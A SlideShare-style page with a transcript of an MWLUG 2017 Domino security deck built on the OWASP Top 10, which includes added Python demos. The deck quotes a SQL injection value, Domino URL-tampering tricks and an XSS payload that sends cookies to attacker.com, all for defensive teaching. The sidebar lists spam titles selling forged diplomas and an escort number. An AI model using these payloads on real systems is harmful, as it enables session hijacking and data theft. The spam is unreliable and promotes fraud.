August Webinar - Water Cooler Talks: A Look into a Developer's Workbench
August Webinar - Water Cooler Talks: A Look into a Developer's WorkbenchAugust Webinar - Water Cooler Talks: A Look into a Developer's Workbench
August Webinar - Water Cooler Talks: A Look into a Developer's WorkbenchHoward Greenberg
 
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!Howard Greenberg
 
OpenNTF Webinar, May 19, 2020
OpenNTF Webinar, May 19, 2020OpenNTF Webinar, May 19, 2020
OpenNTF Webinar, May 19, 2020Howard Greenberg
 
Dev112 let's calendar that
Dev112   let's calendar thatDev112   let's calendar that
Dev112 let's calendar thatHoward Greenberg
 
MWLUG Session- AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
MWLUG Session-  AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...MWLUG Session-  AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
MWLUG Session- AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...Howard Greenberg
 

More from Howard Greenberg (20)

January OpenNTF Webinar - Backup your Domino Server - New Options in V12
January OpenNTF Webinar - Backup your Domino Server - New Options in V12January OpenNTF Webinar - Backup your Domino Server - New Options in V12
January OpenNTF Webinar - Backup your Domino Server - New Options in V12
 
BRPA November Meeting
BRPA November MeetingBRPA November Meeting
BRPA November Meeting
 
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
 
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
 
August OpenNTF Webinar - Git and GitHub Explained
August OpenNTF Webinar - Git and GitHub ExplainedAugust OpenNTF Webinar - Git and GitHub Explained
August OpenNTF Webinar - Git and GitHub Explained
 
July OpenNTF Webinar - HCL Presents Keep, a new API for Domino
July OpenNTF Webinar - HCL Presents Keep, a new API for DominoJuly OpenNTF Webinar - HCL Presents Keep, a new API for Domino
July OpenNTF Webinar - HCL Presents Keep, a new API for Domino
 
June OpenNTF Webinar - Domino V12 Certification Manager
June OpenNTF Webinar - Domino V12 Certification ManagerJune OpenNTF Webinar - Domino V12 Certification Manager
June OpenNTF Webinar - Domino V12 Certification Manager
 
April, 2021 OpenNTF Webinar - Domino Administration Best Practices
April, 2021 OpenNTF Webinar - Domino Administration Best PracticesApril, 2021 OpenNTF Webinar - Domino Administration Best Practices
April, 2021 OpenNTF Webinar - Domino Administration Best Practices
 
OpenNTF Webinar, March, 2021
OpenNTF Webinar, March, 2021OpenNTF Webinar, March, 2021
OpenNTF Webinar, March, 2021
 
February OpenNTF Webinar: Introduction to Ansible for Newbies
February OpenNTF Webinar: Introduction to Ansible for NewbiesFebruary OpenNTF Webinar: Introduction to Ansible for Newbies
February OpenNTF Webinar: Introduction to Ansible for Newbies
 
January OpenNTF Webinar: 4D - Domino Docker Deep Dive
January OpenNTF Webinar: 4D - Domino Docker Deep DiveJanuary OpenNTF Webinar: 4D - Domino Docker Deep Dive
January OpenNTF Webinar: 4D - Domino Docker Deep Dive
 
December OpenNTF Webinar: The Volt MX LotusScript Toolkit
December OpenNTF Webinar: The Volt MX LotusScript ToolkitDecember OpenNTF Webinar: The Volt MX LotusScript Toolkit
December OpenNTF Webinar: The Volt MX LotusScript Toolkit
 
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
 
OpenNTF Webinar, October 2020
OpenNTF Webinar, October 2020OpenNTF Webinar, October 2020
OpenNTF Webinar, October 2020
 
August Webinar - Water Cooler Talks: A Look into a Developer's Workbench
August Webinar - Water Cooler Talks: A Look into a Developer's WorkbenchAugust Webinar - Water Cooler Talks: A Look into a Developer's Workbench
August Webinar - Water Cooler Talks: A Look into a Developer's Workbench
 
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
 
Open ntf 2020-jun
Open ntf 2020-junOpen ntf 2020-jun
Open ntf 2020-jun
 
OpenNTF Webinar, May 19, 2020
OpenNTF Webinar, May 19, 2020OpenNTF Webinar, May 19, 2020
OpenNTF Webinar, May 19, 2020
 
Dev112 let's calendar that
Dev112   let's calendar thatDev112   let's calendar that
Dev112 let's calendar that
 
MWLUG Session- AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
MWLUG Session-  AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...MWLUG Session-  AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
MWLUG Session- AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
 

Recently uploaded

Xen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfXen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfStefano Stabellini
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...OnePlan Solutions
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样umasea
 
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in NoidaBuds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in Noidabntitsolutionsrishis
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsAhmed Mohamed
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...Technogeeks
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024StefanoLambiase
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based projectAnoyGreter
 
Unveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesUnveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesŁukasz Chruściel
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWave PLM
 
How to Track Employee Performance A Comprehensive Guide.pdf
How to Track Employee Performance A Comprehensive Guide.pdfHow to Track Employee Performance A Comprehensive Guide.pdf
How to Track Employee Performance A Comprehensive Guide.pdfLivetecs LLC
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....kzayra69
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)jennyeacort
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odishasmiwainfosol
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Velvetech LLC
 
CRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceCRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceBrainSell Technologies
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaHanief Utama
 
英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作qr0udbr0
 

Recently uploaded (20)

Xen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfXen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdf
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
 
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in NoidaBuds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML Diagrams
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based project
 
Unveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesUnveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New Features
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need It
 
How to Track Employee Performance A Comprehensive Guide.pdf
How to Track Employee Performance A Comprehensive Guide.pdfHow to Track Employee Performance A Comprehensive Guide.pdf
How to Track Employee Performance A Comprehensive Guide.pdf
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...
 
CRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceCRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. Salesforce
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief Utama
 
英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作
 

MWLUG 2017: Lessons on Domino Security from the OWASP Top 10

  • 1. MWLUG 2017 – Moving Collaboration Forward
    Can Domino Be Hacked? Lessons We Can Learn From the Security Community
    Howard Greenberg, Andrew Pollack
  • 2. Our Amazing Sponsors
  • 3. Andrew Pollack – Northern Collaborative Technologies
    • Administrator & Developer since version 2.0
    • IBM Lotus Beacon Award Winner
    • Services
      – Security Review & Penetration Testing
      – Site Performance & Security Reviews
      – Expert Witness & Security Forensics
      – Application Development
      – Administrative Overhaul
    • Products
      – NCT Search
      – NCT Compliance Search
      – NCT Simple Sign On
      – NCT SAML for Domino 7+
    • Structural Firefighter
  • 4. Howard Greenberg
    • Been doing Notes/Domino since 1993
      – Developer, Admin, Consultant, Instructor
    • Co-founded TLCC in 1998
      – Self-paced courses for Notes/Domino and XPages
    • Security Certifications
      – Certified Information Systems Auditor (CISA)
      – Certified Information Security Manager (CISM)
    • Certified Flight Instructor (CFI)
  • 5. Session Goals
    • Review the OWASP Top 10 Web Application Security Issues
    • Relate those to our Domino environments
    HG
  • 6. Why do I care?
    • I have a firewall, no one can touch my Domino environment!
    HG
  • 7. Reality
    Vendors, Suppliers, Customers, Employees
    HG
  • 8. Major Breaches
    • Target – 70MM customer accounts
      – Stole logins from the HVAC subcontractor
        • Via phishing email, then malware got installed
      – Once in, pivoted to registers, installed malware
        • Captured credit card information, then uploaded to hackers
      – Lesson learned: segment networks, encrypt sensitive data
    Did the Firewall help?
    https://www.sans.org/reading-room/whitepapers/casestudies/case-study-critical-controls-prevented-target-breach-35412
    HG
  • 9. OPM Breach
    • Office of Personnel Management (US)
      – Personal data on EVERY Federal employee
        • Plus more...
    • Phishing attack
      – Got login data from a contractor
      – Put malware on admin server
    • Lack of encryption on sensitive databases
    https://www.wired.com/2016/10/inside-cyberattack-shocked-us-government/
    HG
  • 10. Who/What is OWASP
    • "Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software"
    • Publishes a list of the 10 Most Critical Web Application Security Risks
      – Widely respected
      – For each risk it provides:
        • A description
        • Example vulnerabilities
        • Example attacks
        • Guidance on how to avoid it
        • References to OWASP and other related resources
    https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
    HG
  • 11. Top 10 for 2017 (Release Candidate)
    • A1-Injection
    • A2-Broken Authentication and Session Management
    • A3-Cross-Site Scripting (XSS)
    • A4-Broken Access Control
    • A5-Security Misconfiguration
    • A6-Sensitive Data Exposure
    • A7-Insufficient Attack Protection
    • A8-Cross-Site Request Forgery (CSRF)
    • A9-Using Components with Known Vulnerabilities
    • A10-Underprotected APIs
    https://www.owasp.org/index.php/Top_10_2017-Top_10
    HG
  • 12. Sample of Information Published
    Link to PDF
    HG
  • 13. A1 – Injection
    The best way to find out if an application is vulnerable to injection is to verify that all use of interpreters clearly separates untrusted data from the command or query.
    Typically SQL injection. Got any SQL code in your apps (accessing relational data)? Like:
      String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
    The attacker modifies the 'id' parameter value in her browser to send: ' or '1'='1. For example:
      http://example.com/app/accountView?id=' or '1'='1
    This changes the meaning of both queries to return all the records from the accounts table. More dangerous attacks could modify data or even invoke stored procedures.
    HG
  • 14. Domino Vulnerabilities – A1
    • Got SQL code?
      – Use SQL parameters
          "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'"
          "SELECT * FROM accounts WHERE custID= ?"
      – Scrub input
      – Use prepared statements
    HG
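As an added example (not part of the deck), the slide's Java lookup and its parameterized fix rendered in Python against an in-memory SQLite table, so both can be run with the quoted ' or '1'='1 value and compared. The accounts table and its rows are constructed for the example.

```python
import sqlite3

# Constructed sample data (not from the presentation): a tiny "accounts"
# table shaped like the one in the OWASP example the slide quotes.
SAMPLE_ACCOUNTS = [
    ("1001", "Alice", "checking"),
    ("1002", "Bob", "savings"),
    ("1003", "Carol", "checking"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database holding the sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (custID TEXT, owner TEXT, kind TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", SAMPLE_ACCOUNTS)
    conn.commit()
    return conn


def lookup_concatenated(conn: sqlite3.Connection, cust_id: str) -> list:
    """The pattern from the slide: the request parameter is glued into the
    SQL text, so the interpreter cannot tell data from command."""
    query = "SELECT * FROM accounts WHERE custID='" + cust_id + "'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, cust_id: str) -> list:
    """The fix from the slide: a placeholder and a bound parameter. Whatever
    the parameter contains is compared as a value, never parsed as SQL."""
    query = "SELECT * FROM accounts WHERE custID = ?"
    return conn.execute(query, (cust_id,)).fetchall()


def demo_injection() -> dict:
    """Run both lookups with a normal id and with the slide's id payload."""
    conn = make_db()
    payload = "' or '1'='1"  # the value quoted on the slide
    results = {
        "concat_normal": lookup_concatenated(conn, "1002"),
        "param_normal": lookup_parameterized(conn, "1002"),
        "concat_payload": lookup_concatenated(conn, payload),   # every row
        "param_payload": lookup_parameterized(conn, payload),   # no row
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, rows in demo_injection().items():
        print(f"{name:15s} -> {len(rows)} row(s): {rows}")
```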
  • 15. Domino Vulnerabilities – A1
    • Hack Domino URLs
      – Switch from openDocument to editDocument
        http://www.tlcc.com/mwlug/mwlug2017.nsf/topicThread.xsp?documentId=557D7B9B86441DFF85258154004A827A&action=openDocument
    • Pivot to read all documents – open default view
        http://www.tlcc.com/mwlug/mwlug2017.nsf/$defaultview
    • Use zero as the view and open any document by id
        http://www.tlcc.com/mwlug/mwlug2017.nsf/0/557d7b9b86441dff85258154004a827a?EditDocument
    Fix – use proper reader/author names
    Block view access with $$ViewTemplateDefault
    HG
  • 16. A2 – Broken Authentication and Session Management – What is it?
    • User authentication credentials aren't properly protected when stored using hashing or encryption.
    • Credentials can be guessed or overwritten through weak account management functions.
    • Session IDs are exposed in the URL.
    • Session IDs are vulnerable to session fixation attacks.
    • Session IDs don't timeout, or user sessions or authentication tokens aren't properly invalidated during logout.
    • Session IDs aren't rotated after successful login.
    • Passwords, session IDs, and other credentials are sent over unencrypted connections.
    AP
  • 17. A2 – Protecting Stored Credentials
    • Domino is fairly good at this if you let it
      – Use Minimum Password Requirements
      – Protect your Domino Directory
      – Don't store a password file "just in case"
      – Use the "Fewer Name Variants" option
    • Beware of SSO Solutions – including SAML
      – You may be turning over all authentication controls to some other system!
    AP
  • 18. A2 – Weak Management Practices
    • Beware of password recovery processes
      – How do you verify the person requesting the password reset is really the person who should have it? This can also be used to deny service.
      – Any web site that can send you your old password when you request it should not be trusted.
    AP
  • 19. A2 – Session IDs in the URL
    • While Domino doesn't generally do this, some administrators do this to avoid creating Domino users, or to give specific users content within applications based on URLs
      – E.g. URLs that contain specific invoice numbers or trouble ticket IDs to send users to specific documents
    AP
  • 20. A2 – Session "Fixation" Attacks
    • Can your stored authentication token be captured and re-used in Domino?
      – Spoiler alert: yes, it can – and quite easily
    • In session-based authentication the session token is stored in a cookie.
    • Anyone who can create web pages on your server can capture this using a bit of JavaScript.
      – Other servers – including non-Domino servers within your domain – may be able to capture this cookie as well
    AP
  • 21. A2 – Preventing "Fixation" Attacks on Your Domino Servers
    • Code review applications
    • Follow XSS prevention best practices
    • Change the default cookie domain path in your session LTPA token documents
    AP
  • 22. A2 – Passwords, Session IDs on Unencrypted Connections
    • There should no longer be any reason to allow unencrypted HTTP connections at all. Sorry. It's 2017. Stop doing this.
    AP
  • 23. A3 – Cross Site Scripting (XSS)
    You are vulnerable to Server XSS if your server-side code uses user-supplied input as part of the HTML output, and you don't use context-sensitive escaping to ensure it cannot run. If a web page uses JavaScript to dynamically add attacker-controllable data to a page, you may have Client XSS. Ideally, you would avoid sending attacker-controllable data to unsafe JavaScript APIs, but escaping (and to a lesser extent) input validation can be used to make this safe.
    Example Attack Scenario
    The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:
      (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
    The attacker modifies the 'CC' parameter in his browser to:
      '><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
    This attack causes the victim's session ID to be sent to the attacker's website, allowing the attacker to hijack the user's current session.
    HG
  • 24. Domino Vulnerability – A3
    • YES, any web application is!!!
    • Any text input, especially rich text (converts to link)
    • Prevention – always sanitize any input
      • Domino web – look for HTML tags, strip them out
        – Have to roll your own with LotusScript
        – Note: CSJS is not an option!
      • XPages have HTML Filters
    HG
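An added example, not from the deck: the slide's credit-card input rendered without and with escaping for the HTML attribute context, then parsed the way a browser would, so the effect of the quoted CC payload can be compared. Python's html module stands in for the Java string concatenation; the XPages filters on the next slide do the corresponding job on the input side.

```python
import html
from html.parser import HTMLParser

# The request parameter value the slide shows the attacker supplying.
PAYLOAD = ("'><script>document.location='http://www.attacker.com/cgi-bin/"
           "cookie.cgi?foo='+document.cookie</script>'")


def render_unescaped(cc: str) -> str:
    """The slide's snippet, translated from Java: untrusted input is pasted
    straight into a single-quoted HTML attribute."""
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"


def render_escaped(cc: str) -> str:
    """Same markup, but the value is escaped for the attribute context.
    html.escape(quote=True) turns <, >, &, " and ' into entities, so the
    payload can neither close the attribute nor start a new tag."""
    safe = html.escape(cc, quote=True)
    return "<input name='creditcard' type='TEXT' value='" + safe + "'>"


class _TagCollector(HTMLParser):
    """Minimal parser used only to show what a browser would see: the tags
    that result from the markup and the value attribute of the input."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            # attribute values arrive already entity-decoded, as in a browser
            self.input_value = dict(attrs).get("value")


def browser_view(markup: str) -> dict:
    """Parse markup as the browser will and report the tags and input value."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return {"tags": p.tags, "value": p.input_value}


if __name__ == "__main__":
    print("unescaped:", browser_view(render_unescaped(PAYLOAD)))  # a <script> tag appears
    print("escaped:  ", browser_view(render_escaped(PAYLOAD)))    # only <input>, payload is data
```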
  • 25. MWLUG 2017 Moving Collaboration Forward XPages HTML Filters • XPages has built-in filtering • Have to turn on – HTMLFilter – for output – HTMLFilterIn – filters on saving • Use acf as the option! – Identity does nothing, empty kills everything – Turn on for all rich text (server, app, or XPage) xsp.richtext.default.htmlfilter=acf HG More Information!
  • 26. MWLUG 2017 Moving Collaboration Forward A4-Broken Access Control • Not just ACL Settings – but includes them – Maximum Internet Name & Password Access – Anonymous & Default “No Access” on all database you don’t expect web users to access – Obscurity is not Security – (See App Dev Practices) AP
  • 27. MWLUG 2017 Moving Collaboration Forward A5-Security Misconfiguration • Don’t expose your operating system to the internet. • Turn off all services you don’t need • Keep your Domino version fully up to date – Tools like “Metasploit” know all about Domino – Out of date servers can be hacked to a remote command line in 30 seconds with menu driven hacking tools AP
  • 28. MWLUG 2017 Moving Collaboration Forward A5 – Use Good HTTP Password Management practices • Assign HTTP Passwords even if you don’t use them. This field will get filled in with garbage if you do not. – These are also used to attack your SMTP mail handler AP
  • 29. MWLUG 2017 Moving Collaboration Forward A5 – Don’t Help the Hackers • By default your server tells the world what software you’re running. It’s like you WANT to get hacked AP
  • 30. MWLUG 2017 Moving Collaboration Forward A5 – Don’t Help the Hackers! • HTTPDisableServerHeader=1 • Then Get Fancy! Add your own SERVER header AP
  • 31. MWLUG 2017 Moving Collaboration Forward A5 - Set up SSL the right way • Use TLS • Use the right SSL settings • Use a score check service to validate AP www.ssllabs.com/ssltest/index.html
  • 32. MWLUG 2017 Moving Collaboration Forward A5 – Domino Web Server Settings May need to modify ciphers available Disable_SSLV3=1 SSL_USE_CLIENT_CIPHER_ORDER=1
  • 33. MWLUG 2017 Moving Collaboration Forward A6- Sensitive Data Exposure Am I vulnerable to Data Exposure? The first thing you have to determine is which data is sensitive enough to require extra protection. For example, passwords, credit card numbers, health records, and personal information should be protected. For all such data: 1. Is any of this data stored in clear text long term, including backups of this data? 2. Is any of this data transmitted in clear text, internally or externally? Internet traffic is especially dangerous. 3. Are any old / weak cryptographic algorithms used? 4. Are weak crypto keys generated, or is proper key management or rotation missing? 5. Are any browser security directives or headers missing when sensitive data is provided by / sent to the browser? HG
  • 34. MWLUG 2017 Moving Collaboration Forward Domino Vulnerability – A6 Know your data, what is sensitive - RISK ANALYSIS! • HTTPS should be turned on/forced for anything that may be sensitive - protect data in motion • Store data in encrypted fields protect data when sitting – Notes encryption (field level), now in XPages in FP8! • Use TLS 1.2 only, older encryption is vulnerable – Turn off SSLV3 • Passwords in names.nsf – setting to hash in better encrypted ways • PCI - If your company takes credit cards, you are subject to PCI • PII - personal information, many rules for EU, states, etc. HG
• 35. A7 – Insufficient Attack Protection (AP)
  Am I vulnerable to attack? Detecting, responding to, and blocking attacks makes applications dramatically harder to exploit, yet almost no applications or APIs have such protection. Critical vulnerabilities in both custom code and components are also discovered all the time, yet organizations frequently take weeks or even months to roll out new defenses.
  It should be very obvious if attack detection and response isn’t in place. Simply try manual attacks or run a scanner against the application. The application or API should identify the attacks, block any viable attacks, and provide details on the attacker and characteristics of the attack. If you can’t quickly roll out virtual and/or actual patches when a critical vulnerability is discovered, you are left exposed to attack.
• 36. A7 – Insufficient Attack Protection (AP)
  – Is anyone monitoring your HTTP and SMTP logs to look for attacks? Repeated login failures from one address and long runs of 404s are the two patterns that stand out first.
  – Does your company have an IDS (Intrusion Detection System)?
  – Fail2Ban: the poor Linux admin’s IDS. It tails a log, matches a failure pattern and bans the source IP at the firewall for a while.
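What "monitoring your HTTP logs" looks like in practice, as an added example that is not part of the presentation: a small script that reads a Domino HTTP access log written in Common Log Format (Domino’s "Common" text log option) and flags the two patterns above, a burst of login failures from one address and an address probing many paths that do not exist. It assumes that a failed session (form) login appears as a POST to names.nsf?Login answered with 200 (the form served again) while a successful one is answered with a 302 redirect; verify that against your own log before trusting the counts. All log lines in it are constructed.

```python
"""Spot credential-guessing bursts and directory scanning in a Domino HTTP
access log.  Added example, not part of the presentation.  Assumes Common Log
Format and that a failed form login is a POST to names.nsf?Login answered
with 200 while a successful one gets a 302 (verify against your own log).
All log lines below are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

CLF = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"   # e.g. 10/Aug/2017:14:03:21 -0400


def parse_line(line):
    """Parse one CLF line into a dict, or return None if it does not match."""
    m = CLF.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def is_auth_failure(rec):
    """401/403 (basic auth or ACL denial), or a form login answered with 200,
    i.e. the login page served again (assumption, see module docstring)."""
    if rec["status"] in (401, 403):
        return True
    return (rec["method"] == "POST"
            and "?login" in rec["path"].lower()
            and rec["status"] == 200)


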